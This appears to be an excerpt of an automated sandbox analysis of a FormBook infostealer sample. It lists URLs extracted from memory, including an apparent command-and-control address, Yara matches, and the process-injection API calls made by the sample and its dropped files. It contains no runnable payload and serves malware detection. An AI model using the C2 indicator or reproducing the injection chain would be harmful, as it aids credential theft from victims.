Source: E8q16bf9QD.exe, 00000000.00000002.1162124173.0000000021406000.00000004.00001000.00020000.00000000.sdmp, E8q16bf9QD.exe, 00000000.00000003.1103236866.0000000021541000.00000004.00000020.00020000.00000000.sdmp, E8q16bf9QD.exe, 00000000.00000003.1103658560.000000007EED0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: E8q16bf9QD.exe, 00000000.00000002.1162124173.0000000021406000.00000004.00001000.00020000.00000000.sdmp, E8q16bf9QD.exe, 00000000.00000003.1103236866.0000000021541000.00000004.00000020.00020000.00000000.sdmp, E8q16bf9QD.exe, 00000000.00000003.1103658560.000000007EED0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
Source: E8q16bf9QD.exe, 00000000.00000002.1162124173.0000000021406000.00000004.00001000.00020000.00000000.sdmp, E8q16bf9QD.exe, 00000000.00000003.1103236866.0000000021541000.00000004.00000020.00020000.00000000.sdmp, E8q16bf9QD.exe, 00000000.00000003.1103658560.000000007EED0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: E8q16bf9QD.exe, 00000000.00000003.1103658560.000000007EED0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: E8q16bf9QD.exe, 00000000.00000002.1162124173.0000000021406000.00000004.00001000.00020000.00000000.sdmp, E8q16bf9QD.exe, 00000000.00000003.1103236866.0000000021541000.00000004.00000020.00020000.00000000.sdmp, E8q16bf9QD.exe, 00000000.00000003.1103658560.000000007EED0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0=
Source: E8q16bf9QD.exe, 00000000.00000002.1162124173.0000000021406000.00000004.00001000.00020000.00000000.sdmp, E8q16bf9QD.exe, 00000000.00000003.1103236866.0000000021541000.00000004.00000020.00020000.00000000.sdmp, E8q16bf9QD.exe, 00000000.00000003.1103658560.000000007EED0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0
Source: E8q16bf9QD.exe, 00000000.00000002.1162124173.0000000021406000.00000004.00001000.00020000.00000000.sdmp, E8q16bf9QD.exe, 00000000.00000003.1103236866.0000000021541000.00000004.00000020.00020000.00000000.sdmp, E8q16bf9QD.exe, 00000000.00000003.1103658560.000000007EED0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0A
Source: E8q16bf9QD.exe, 00000000.00000002.1162124173.0000000021406000.00000004.00001000.00020000.00000000.sdmp, E8q16bf9QD.exe, 00000000.00000003.1103236866.0000000021541000.00000004.00000020.00020000.00000000.sdmp, E8q16bf9QD.exe, 00000000.00000003.1103658560.000000007EED0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0C
Source: E8q16bf9QD.exe, 00000000.00000002.1162124173.0000000021406000.00000004.00001000.00020000.00000000.sdmp, E8q16bf9QD.exe, 00000000.00000003.1103236866.0000000021541000.00000004.00000020.00020000.00000000.sdmp, E8q16bf9QD.exe, 00000000.00000003.1103658560.000000007EED0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0X
Source: E8q16bf9QD.exe, 00000000.00000002.1162124173.0000000021406000.00000004.00001000.00020000.00000000.sdmp, E8q16bf9QD.exe, 00000000.00000003.1103236866.0000000021541000.00000004.00000020.00020000.00000000.sdmp, E8q16bf9QD.exe, 00000000.00000003.1103658560.000000007EED0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://pki.eset.com/crl/csca2020.crl0I
Source: E8q16bf9QD.exe, 00000000.00000002.1162124173.0000000021406000.00000004.00001000.00020000.00000000.sdmp, E8q16bf9QD.exe, 00000000.00000003.1105416957.0000000021582000.00000004.00000020.00020000.00000000.sdmp, E8q16bf9QD.exe, 00000000.00000003.1103236866.0000000021541000.00000004.00000020.00020000.00000000.sdmp, E8q16bf9QD.exe, 00000000.00000002.1162810216.00000000215C5000.00000004.00000020.00020000.00000000.sdmp, E8q16bf9QD.exe, 00000000.00000003.1103658560.000000007EED0000.00000004.00001000.00020000.00000000.sdmp, E8q16bf9QD.exe, 00000000.00000003.1105416957.00000000215C5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://pki.eset.com/crl/rootca2020.crl0?
Source: E8q16bf9QD.exe, 00000000.00000002.1162124173.0000000021406000.00000004.00001000.00020000.00000000.sdmp, E8q16bf9QD.exe, 00000000.00000003.1103236866.0000000021541000.00000004.00000020.00020000.00000000.sdmp, E8q16bf9QD.exe, 00000000.00000003.1103658560.000000007EED0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://pki.eset.com/crl/tsca2020.crl0?
Source: E8q16bf9QD.exe, 00000000.00000002.1162124173.0000000021406000.00000004.00001000.00020000.00000000.sdmp, E8q16bf9QD.exe, 00000000.00000003.1103236866.0000000021541000.00000004.00000020.00020000.00000000.sdmp, E8q16bf9QD.exe, 00000000.00000003.1103658560.000000007EED0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://pki.eset.com/crt/csca2020.crt05
Source: E8q16bf9QD.exe, 00000000.00000002.1162124173.0000000021406000.00000004.00001000.00020000.00000000.sdmp, E8q16bf9QD.exe, 00000000.00000003.1105416957.0000000021582000.00000004.00000020.00020000.00000000.sdmp, E8q16bf9QD.exe, 00000000.00000003.1103236866.0000000021541000.00000004.00000020.00020000.00000000.sdmp, E8q16bf9QD.exe, 00000000.00000002.1162810216.00000000215C5000.00000004.00000020.00020000.00000000.sdmp, E8q16bf9QD.exe, 00000000.00000003.1103658560.000000007EED0000.00000004.00001000.00020000.00000000.sdmp, E8q16bf9QD.exe, 00000000.00000003.1105416957.00000000215C5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://pki.eset.com/crt/rootca2020.crt07
Source: E8q16bf9QD.exe, 00000000.00000002.1162124173.0000000021406000.00000004.00001000.00020000.00000000.sdmp, E8q16bf9QD.exe, 00000000.00000003.1103236866.0000000021541000.00000004.00000020.00020000.00000000.sdmp, E8q16bf9QD.exe, 00000000.00000003.1103658560.000000007EED0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://pki.eset.com/crt/tsca2020.crt05
Source: E8q16bf9QD.exe, 00000000.00000002.1162124173.0000000021406000.00000004.00001000.00020000.00000000.sdmp, E8q16bf9QD.exe, 00000000.00000003.1105416957.0000000021582000.00000004.00000020.00020000.00000000.sdmp, E8q16bf9QD.exe, 00000000.00000003.1103236866.0000000021541000.00000004.00000020.00020000.00000000.sdmp, E8q16bf9QD.exe, 00000000.00000002.1162810216.00000000215C5000.00000004.00000020.00020000.00000000.sdmp, E8q16bf9QD.exe, 00000000.00000003.1103658560.000000007EED0000.00000004.00001000.00020000.00000000.sdmp, E8q16bf9QD.exe, 00000000.00000003.1105416957.00000000215C5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://pki.eset.com/csp0
Source: E8q16bf9QD.exe, 00000000.00000002.1162124173.0000000021406000.00000004.00001000.00020000.00000000.sdmp, E8q16bf9QD.exe, 00000000.00000003.1103236866.0000000021541000.00000004.00000020.00020000.00000000.sdmp, E8q16bf9QD.exe, 00000000.00000003.1103658560.000000007EED0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://www.digicert.com/CPS0
Source: oSAWneqzPiahr.exe, 00000015.00000002.3578481874.0000000005624000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.earnpet.xyz
Source: oSAWneqzPiahr.exe, 00000015.00000002.3578481874.0000000005624000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.earnpet.xyz/7y0d/
Source: E8q16bf9QD.exe, 00000000.00000002.1162723099.0000000021540000.00000004.00000020.00020000.00000000.sdmp, E8q16bf9QD.exe, 00000000.00000002.1162840561.000000002175E000.00000004.00001000.00020000.00000000.sdmp, E8q16bf9QD.exe, 00000000.00000002.1160502889.0000000020A63000.00000004.00001000.00020000.00000000.sdmp, E8q16bf9QD.exe, 00000000.00000003.1105240446.00000000007FF000.00000004.00000020.00020000.00000000.sdmp, E8q16bf9QD.exe, 00000000.00000003.1102777550.000000007EBB9000.00000004.00001000.00020000.00000000.sdmp, E8q16bf9QD.exe, 00000000.00000003.1102777550.000000007EB60000.00000004.00001000.00020000.00000000.sdmp, E8q16bf9QD.exe, 00000000.00000002.1163403517.000000007F039000.00000004.00001000.00020000.00000000.sdmp, iaoqralA.pif, 00000006.00000001.1106426029.00000000008E9000.00000040.00000001.00020000.00000000.sdmp, iaoqralA.pif, 00000006.00000000.1105814552.0000000000416000.00000002.00000001.01000000.00000005.sdmp, systeminfo.exe, 00000014.00000002.3577326136.0000000004B7C000.00000004.10000000.00040000.00000000.sdmp, systeminfo.exe, 00000014.00000002.3574904730.00000000008DA000.00000004.00000020.00020000.00000000.sdmp, oSAWneqzPiahr.exe, 00000015.00000002.3576873405.000000000316C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000016.00000002.1656958099.000000002004C000.00000004.80000000.00040000.00000000.sdmp, iaoqralA.pif.0.dr	String found in binary or memory: http://www.pmail.com
Source: systeminfo.exe, 00000014.00000003.1551913667.00000000075CE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org?q=
Source: systeminfo.exe, 00000014.00000003.1551913667.00000000075CE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: systeminfo.exe, 00000014.00000003.1551913667.00000000075CE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: systeminfo.exe, 00000014.00000003.1551913667.00000000075CE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: systeminfo.exe, 00000014.00000003.1551913667.00000000075CE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: systeminfo.exe, 00000014.00000003.1551913667.00000000075CE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtabv20
Source: systeminfo.exe, 00000014.00000003.1551913667.00000000075CE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: systeminfo.exe, 00000014.00000003.1551913667.00000000075CE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://gemini.google.com/app?q=
Source: systeminfo.exe, 00000014.00000002.3574904730.00000000008FB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
Source: systeminfo.exe, 00000014.00000002.3574904730.00000000008FB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
Source: systeminfo.exe, 00000014.00000002.3574904730.00000000008FB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
Source: systeminfo.exe, 00000014.00000002.3574904730.00000000008FB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
Source: systeminfo.exe, 00000014.00000002.3574904730.00000000008FB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
Source: systeminfo.exe, 00000014.00000002.3574904730.00000000008FB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
Source: systeminfo.exe, 00000014.00000003.1546915460.00000000075AF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
Source: systeminfo.exe, 00000014.00000003.1551913667.00000000075CE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/v20
Source: systeminfo.exe, 00000014.00000003.1551913667.00000000075CE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_alldp.ico

E-Banking Fraud

Yara detected FormBook

Source: Yara match	File source: 6.2.iaoqralA.pif.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.iaoqralA.pif.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000006.00000002.1366673242.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000002.3576641121.0000000003A60000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.1381979341.000000001BD90000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000002.3578481874.00000000055A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000002.3576518310.00000000042F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000002.3574489923.0000000000650000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.1382817620.000000001D6D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000002.3576588252.0000000004340000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Source: C:\Users\user\Desktop\E8q16bf9QD.exe	Code function: 0_2_02D03208 NtAllocateVirtualMemory,	0_2_02D03208
Source: C:\Users\user\Desktop\E8q16bf9QD.exe	Code function: 0_2_02D0A0AC RtlDosPathNameToNtPathName_U,NtCreateFile,NtWriteFile,NtClose,	0_2_02D0A0AC
Source: C:\Users\user\Desktop\E8q16bf9QD.exe	Code function: 0_2_02D0A024 RtlInitUnicodeString,RtlDosPathNameToNtPathName_U,NtDeleteFile,	0_2_02D0A024
Source: C:\Users\user\Desktop\E8q16bf9QD.exe	Code function: 0_2_02D0A190 RtlDosPathNameToNtPathName_U,NtOpenFile,NtQueryInformationFile,NtReadFile,NtClose,	0_2_02D0A190
Source: C:\Users\user\Desktop\E8q16bf9QD.exe	Code function: 0_2_02D05634 GetThreadContext,Wow64GetThreadContext,SetThreadContext,Wow64SetThreadContext,NtResumeThread,	0_2_02D05634
Source: C:\Users\user\Desktop\E8q16bf9QD.exe	Code function: 0_2_02D03554 NtWriteVirtualMemory,	0_2_02D03554
Source: C:\Users\user\Desktop\E8q16bf9QD.exe	Code function: 0_2_02D03AA8 NtReadVirtualMemory,	0_2_02D03AA8
Source: C:\Users\user\Desktop\E8q16bf9QD.exe	Code function: 0_2_02D03D18 NtUnmapViewOfSection,	0_2_02D03D18
Source: C:\Users\user\Desktop\E8q16bf9QD.exe	Code function: 0_2_02D03206 NtAllocateVirtualMemory,	0_2_02D03206
Source: C:\Users\user\Desktop\E8q16bf9QD.exe	Code function: 0_2_02D05632 GetThreadContext,Wow64GetThreadContext,SetThreadContext,Wow64SetThreadContext,NtResumeThread,	0_2_02D05632
Source: C:\Users\user\Desktop\E8q16bf9QD.exe	Code function: 0_2_02D09FD0 RtlInitUnicodeString,RtlDosPathNameToNtPathName_U,NtDeleteFile,	0_2_02D09FD0
Source: C:\Users\user\Links\iaoqralA.pif	Code function: 6_2_0042C663 NtClose,	6_2_0042C663
Source: C:\Users\user\Links\iaoqralA.pif	Code function: 6_2_1BE935C0 NtCreateMutant,LdrInitializeThunk,	6_2_1BE935C0
Source: C:\Users\user\Links\iaoqralA.pif	Code function: 6_2_1BE92B60 NtClose,LdrInitializeThunk,	6_2_1BE92B60
Source: C:\Users\user\Links\iaoqralA.pif	Code function: 6_2_1BE92DF0 NtQuerySystemInformation,LdrInitializeThunk,	6_2_1BE92DF0
Source: C:\Users\user\Links\iaoqralA.pif	Code function: 6_2_1BE92C70 NtFreeVirtualMemory,LdrInitializeThunk,	6_2_1BE92C70
Source: C:\Users\user\Links\iaoqralA.pif	Code function: 6_2_1BE939B0 NtGetContextThread,	6_2_1BE939B0
Source: C:\Users\user\Links\iaoqralA.pif	Code function: 6_2_1BE93D70 NtOpenThread,	6_2_1BE93D70
Source: C:\Users\user\Links\iaoqralA.pif	Code function: 6_2_1BE93D10 NtOpenProcessToken,	6_2_1BE93D10
Source: C:\Users\user\Links\iaoqralA.pif	Code function: 6_2_1BE93090 NtSetValueKey,	6_2_1BE93090
Source: C:\Users\user\Links\iaoqralA.pif	Code function: 6_2_1BE93010 NtOpenDirectoryObject,	6_2_1BE93010
Source: C:\Users\user\Links\iaoqralA.pif	Code function: 6_2_1BE92BE0 NtQueryValueKey,	6_2_1BE92BE0
Source: C:\Users\user\Links\iaoqralA.pif	Code function: 6_2_1BE92BF0 NtAllocateVirtualMemory,	6_2_1BE92BF0
Source: C:\Users\user\Links\iaoqralA.pif	Code function: 6_2_1BE92BA0 NtEnumerateValueKey,	6_2_1BE92BA0
Source: C:\Users\user\Links\iaoqralA.pif	Code function: 6_2_1BE92B80 NtQueryInformationFile,	6_2_1BE92B80
Source: C:\Users\user\Links\iaoqralA.pif	Code function: 6_2_1BE92AF0 NtWriteFile,	6_2_1BE92AF0
Source: C:\Users\user\Links\iaoqralA.pif	Code function: 6_2_1BE92AD0 NtReadFile,	6_2_1BE92AD0
Source: C:\Users\user\Links\iaoqralA.pif	Code function: 6_2_1BE92AB0 NtWaitForSingleObject,	6_2_1BE92AB0
Source: C:\Users\user\Links\iaoqralA.pif	Code function: 6_2_1BE92FE0 NtCreateFile,	6_2_1BE92FE0
Source: C:\Users\user\Links\iaoqralA.pif	Code function: 6_2_1BE92FA0 NtQuerySection,	6_2_1BE92FA0
Source: C:\Users\user\Links\iaoqralA.pif	Code function: 6_2_1BE92FB0 NtResumeThread,	6_2_1BE92FB0
Source: C:\Users\user\Links\iaoqralA.pif	Code function: 6_2_1BE92F90 NtProtectVirtualMemory,	6_2_1BE92F90
Source: C:\Users\user\Links\iaoqralA.pif	Code function: 6_2_1BE92F60 NtCreateProcessEx,	6_2_1BE92F60
Source: C:\Users\user\Links\iaoqralA.pif	Code function: 6_2_1BE92F30 NtCreateSection,	6_2_1BE92F30
Source: C:\Users\user\Links\iaoqralA.pif	Code function: 6_2_1BE92EE0 NtQueueApcThread,	6_2_1BE92EE0
Source: C:\Users\user\Links\iaoqralA.pif	Code function: 6_2_1BE92EA0 NtAdjustPrivilegesToken,	6_2_1BE92EA0
Source: C:\Users\user\Links\iaoqralA.pif	Code function: 6_2_1BE92E80 NtReadVirtualMemory,	6_2_1BE92E80
Source: C:\Users\user\Links\iaoqralA.pif	Code function: 6_2_1BE92E30 NtWriteVirtualMemory,	6_2_1BE92E30
Source: C:\Users\user\Links\iaoqralA.pif	Code function: 6_2_1BE92DD0 NtDelayExecution,	6_2_1BE92DD0
Source: C:\Users\user\Links\iaoqralA.pif	Code function: 6_2_1BE92DB0 NtEnumerateKey,	6_2_1BE92DB0
Source: C:\Users\user\Links\iaoqralA.pif	Code function: 6_2_1BE92D30 NtUnmapViewOfSection,	6_2_1BE92D30
Source: C:\Users\user\Links\iaoqralA.pif	Code function: 6_2_1BE92D00 NtSetInformationFile,	6_2_1BE92D00
Source: C:\Users\user\Links\iaoqralA.pif	Code function: 6_2_1BE92D10 NtMapViewOfSection,	6_2_1BE92D10
Source: C:\Users\user\Links\iaoqralA.pif	Code function: 6_2_1BE92CF0 NtOpenProcess,	6_2_1BE92CF0
Source: C:\Users\user\Links\iaoqralA.pif	Code function: 6_2_1BE92CC0 NtQueryVirtualMemory,	6_2_1BE92CC0
Source: C:\Users\user\Links\iaoqralA.pif	Code function: 6_2_1BE92CA0 NtQueryInformationToken,	6_2_1BE92CA0
Source: C:\Users\user\Links\iaoqralA.pif	Code function: 6_2_1BE92C60 NtCreateKey,	6_2_1BE92C60
Source: C:\Users\user\Links\iaoqralA.pif	Code function: 6_2_1BE92C00 NtQueryInformationProcess,	6_2_1BE92C00
Source: C:\Users\user\Links\iaoqralA.pif	Code function: 6_2_1BE94340 NtSetContextThread,	6_2_1BE94340
Source: C:\Users\user\Links\iaoqralA.pif	Code function: 6_2_1BE94650 NtSuspendThread,	6_2_1BE94650
Source: C:\Users\Public\alpha.pif	Code function: 9_2_00264823 NtQueryVolumeInformationFile,GetFileInformationByHandleEx,	9_2_00264823
Source: C:\Users\Public\alpha.pif	Code function: 9_2_0026643A NtOpenThreadToken,NtOpenProcessToken,NtClose,	9_2_0026643A
Source: C:\Users\Public\alpha.pif	Code function: 9_2_00277460 EnterCriticalSection,LeaveCriticalSection,fprintf,fflush,TryAcquireSRWLockExclusive,NtCancelSynchronousIoFile,ReleaseSRWLockExclusive,_get_osfhandle,FlushConsoleInputBuffer,	9_2_00277460
Source: C:\Users\Public\alpha.pif	Code function: 9_2_002664CA NtQueryInformationToken,	9_2_002664CA
Source: C:\Users\Public\alpha.pif	Code function: 9_2_0027A135 NtSetInformationFile,	9_2_0027A135
Source: C:\Users\Public\alpha.pif	Code function: 9_2_00266500 NtQueryInformationToken,NtQueryInformationToken,	9_2_00266500
Source: C:\Users\Public\alpha.pif	Code function: 9_2_0027C1FA SetLastError,CreateDirectoryW,CreateFileW,RtlDosPathNameToNtPathName_U,memset,memcpy,memcpy,NtFsControlFile,RtlNtStatusToDosError,SetLastError,CloseHandle,RtlFreeHeap,RemoveDirectoryW,	9_2_0027C1FA
Source: C:\Users\Public\alpha.pif	Code function: 9_2_00254E3B _setjmp3,NtQueryInformationProcess,NtSetInformationProcess,NtSetInformationProcess,longjmp,	9_2_00254E3B
Source: C:\Users\Public\alpha.pif	Code function: 9_2_00264759 RtlDosPathNameToRelativeNtPathName_U_WithStatus,NtOpenFile,RtlReleaseRelativeName,RtlFreeUnicodeString,CloseHandle,DeleteFileW,GetLastError,	9_2_00264759
Source: C:\Windows\SysWOW64\systeminfo.exe	Code function: 20_2_045C4650 NtSuspendThread,LdrInitializeThunk,	20_2_045C4650
Source: C:\Windows\SysWOW64\systeminfo.exe	Code function: 20_2_045C4340 NtSetContextThread,LdrInitializeThunk,	20_2_045C4340
Source: C:\Windows\SysWOW64\systeminfo.exe	Code function: 20_2_045C2C70 NtFreeVirtualMemory,LdrInitializeThunk,	20_2_045C2C70
Source: C:\Windows\SysWOW64\systeminfo.exe	Code function: 20_2_045C2C60 NtCreateKey,LdrInitializeThunk,	20_2_045C2C60
Source: C:\Windows\SysWOW64\systeminfo.exe	Code function: 20_2_045C2CA0 NtQueryInformationToken,LdrInitializeThunk,	20_2_045C2CA0
Source: C:\Windows\SysWOW64\systeminfo.exe	Code function: 20_2_045C2D10 NtMapViewOfSection,LdrInitializeThunk,	20_2_045C2D10
Source: C:\Windows\SysWOW64\systeminfo.exe	Code function: 20_2_045C2D30 NtUnmapViewOfSection,LdrInitializeThunk,	20_2_045C2D30
Source: C:\Windows\SysWOW64\systeminfo.exe	Code function: 20_2_045C2DD0 NtDelayExecution,LdrInitializeThunk,	20_2_045C2DD0
Source: C:\Windows\SysWOW64\systeminfo.exe	Code function: 20_2_045C2DF0 NtQuerySystemInformation,LdrInitializeThunk,	20_2_045C2DF0
Source: C:\Windows\SysWOW64\systeminfo.exe	Code function: 20_2_045C2EE0 NtQueueApcThread,LdrInitializeThunk,	20_2_045C2EE0
Source: C:\Windows\SysWOW64\systeminfo.exe	Code function: 20_2_045C2E80 NtReadVirtualMemory,LdrInitializeThunk,	20_2_045C2E80
Source: C:\Windows\SysWOW64\systeminfo.exe	Code function: 20_2_045C2F30 NtCreateSection,LdrInitializeThunk,	20_2_045C2F30
Source: C:\Windows\SysWOW64\systeminfo.exe	Code function: 20_2_045C2FE0 NtCreateFile,LdrInitializeThunk,	20_2_045C2FE0
Source: C:\Windows\SysWOW64\systeminfo.exe	Code function: 20_2_045C2FB0 NtResumeThread,LdrInitializeThunk,	20_2_045C2FB0
Source: C:\Windows\SysWOW64\systeminfo.exe	Code function: 20_2_045C2AD0 NtReadFile,LdrInitializeThunk,	20_2_045C2AD0
Source: C:\Windows\SysWOW64\systeminfo.exe	Code function: 20_2_045C2AF0 NtWriteFile,LdrInitializeThunk,	20_2_045C2AF0
Source: C:\Windows\SysWOW64\systeminfo.exe	Code function: 20_2_045C2B60 NtClose,LdrInitializeThunk,	20_2_045C2B60
Source: C:\Windows\SysWOW64\systeminfo.exe	Code function: 20_2_045C2BF0 NtAllocateVirtualMemory,LdrInitializeThunk,	20_2_045C2BF0
Source: C:\Windows\SysWOW64\systeminfo.exe	Code function: 20_2_045C2BE0 NtQueryValueKey,LdrInitializeThunk,	20_2_045C2BE0
Source: C:\Windows\SysWOW64\systeminfo.exe	Code function: 20_2_045C2BA0 NtEnumerateValueKey,LdrInitializeThunk,	20_2_045C2BA0
Source: C:\Windows\SysWOW64\systeminfo.exe	Code function: 20_2_045C35C0 NtCreateMutant,LdrInitializeThunk,	20_2_045C35C0
Source: C:\Windows\SysWOW64\systeminfo.exe	Code function: 20_2_045C39B0 NtGetContextThread,LdrInitializeThunk,	20_2_045C39B0
Source: C:\Windows\SysWOW64\systeminfo.exe	Code function: 20_2_045C2C00 NtQueryInformationProcess,	20_2_045C2C00
Source: C:\Windows\SysWOW64\systeminfo.exe	Code function: 20_2_045C2CC0 NtQueryVirtualMemory,	20_2_045C2CC0
Source: C:\Windows\SysWOW64\systeminfo.exe	Code function: 20_2_045C2CF0 NtOpenProcess,	20_2_045C2CF0
Source: C:\Windows\SysWOW64\systeminfo.exe	Code function: 20_2_045C2D00 NtSetInformationFile,	20_2_045C2D00
Source: C:\Windows\SysWOW64\systeminfo.exe	Code function: 20_2_045C2DB0 NtEnumerateKey,	20_2_045C2DB0
Source: C:\Windows\SysWOW64\systeminfo.exe	Code function: 20_2_045C2E30 NtWriteVirtualMemory,	20_2_045C2E30
Source: C:\Windows\SysWOW64\systeminfo.exe	Code function: 20_2_045C2EA0 NtAdjustPrivilegesToken,	20_2_045C2EA0
Source: C:\Windows\SysWOW64\systeminfo.exe	Code function: 20_2_045C2F60 NtCreateProcessEx,	20_2_045C2F60
Source: C:\Windows\SysWOW64\systeminfo.exe	Code function: 20_2_045C2F90 NtProtectVirtualMemory,	20_2_045C2F90
Source: C:\Windows\SysWOW64\systeminfo.exe	Code function: 20_2_045C2FA0 NtQuerySection,	20_2_045C2FA0
Source: C:\Windows\SysWOW64\systeminfo.exe	Code function: 20_2_045C2AB0 NtWaitForSingleObject,	20_2_045C2AB0
Source: C:\Windows\SysWOW64\systeminfo.exe	Code function: 20_2_045C2B80 NtQueryInformationFile,	20_2_045C2B80
Source: C:\Windows\SysWOW64\systeminfo.exe	Code function: 20_2_045C3010 NtOpenDirectoryObject,	20_2_045C3010
Source: C:\Windows\SysWOW64\systeminfo.exe	Code function: 20_2_045C3090 NtSetValueKey,	20_2_045C3090
Source: C:\Windows\SysWOW64\systeminfo.exe	Code function: 20_2_045C3D70 NtOpenThread,	20_2_045C3D70
Source: C:\Windows\SysWOW64\systeminfo.exe	Code function: 20_2_045C3D10 NtOpenProcessToken,	20_2_045C3D10
Source: C:\Windows\SysWOW64\systeminfo.exe	Code function: 20_2_006790B0 NtCreateFile,	20_2_006790B0
Source: C:\Windows\SysWOW64\systeminfo.exe	Code function: 20_2_00679210 NtReadFile,	20_2_00679210
Source: C:\Windows\SysWOW64\systeminfo.exe	Code function: 20_2_00679300 NtDeleteFile,	20_2_00679300
Source: C:\Windows\SysWOW64\systeminfo.exe	Code function: 20_2_006793A0 NtClose,	20_2_006793A0
Source: C:\Windows\SysWOW64\systeminfo.exe	Code function: 20_2_00679510 NtAllocateVirtualMemory,	20_2_00679510

Source: C:\Users\Public\alpha.pif

Code function: 9_2_00254C10: memset,GetFileSecurityW,GetSecurityDescriptorOwner,??_V@YAXPAX@Z,memset,CreateFileW,DeviceIoControl,memcpy,CloseHandle,??_V@YAXPAX@Z,memset,??_V@YAXPAX@Z,FindClose,??_V@YAXPAX@Z,

9_2_00254C10

Source: C:\Users\user\Desktop\E8q16bf9QD.exe

Code function: 0_2_02D03DD8 CreateProcessAsUserW,

0_2_02D03DD8

Source: C:\Users\Public\alpha.pif	File created: C:\Windows			Jump to behavior
Source: C:\Users\Public\alpha.pif	File created: C:\Windows \SysWOW64			Jump to behavior

Source: C:\Users\user\Desktop\E8q16bf9QD.exe	Code function: 0_2_02CF20B4	0_2_02CF20B4
Source: C:\Users\user\Links\iaoqralA.pif	Code function: 6_2_00418603	6_2_00418603
Source: C:\Users\user\Links\iaoqralA.pif	Code function: 6_2_0040E04C	6_2_0040E04C
Source: C:\Users\user\Links\iaoqralA.pif	Code function: 6_2_00410053	6_2_00410053
Source: C:\Users\user\Links\iaoqralA.pif	Code function: 6_2_0040E053	6_2_0040E053
Source: C:\Users\user\Links\iaoqralA.pif	Code function: 6_2_00403060	6_2_00403060
Source: C:\Users\user\Links\iaoqralA.pif	Code function: 6_2_00416803	6_2_00416803
Source: C:\Users\user\Links\iaoqralA.pif	Code function: 6_2_0040E197	6_2_0040E197
Source: C:\Users\user\Links\iaoqralA.pif	Code function: 6_2_0040E1A3	6_2_0040E1A3
Source: C:\Users\user\Links\iaoqralA.pif	Code function: 6_2_00401BE5	6_2_00401BE5
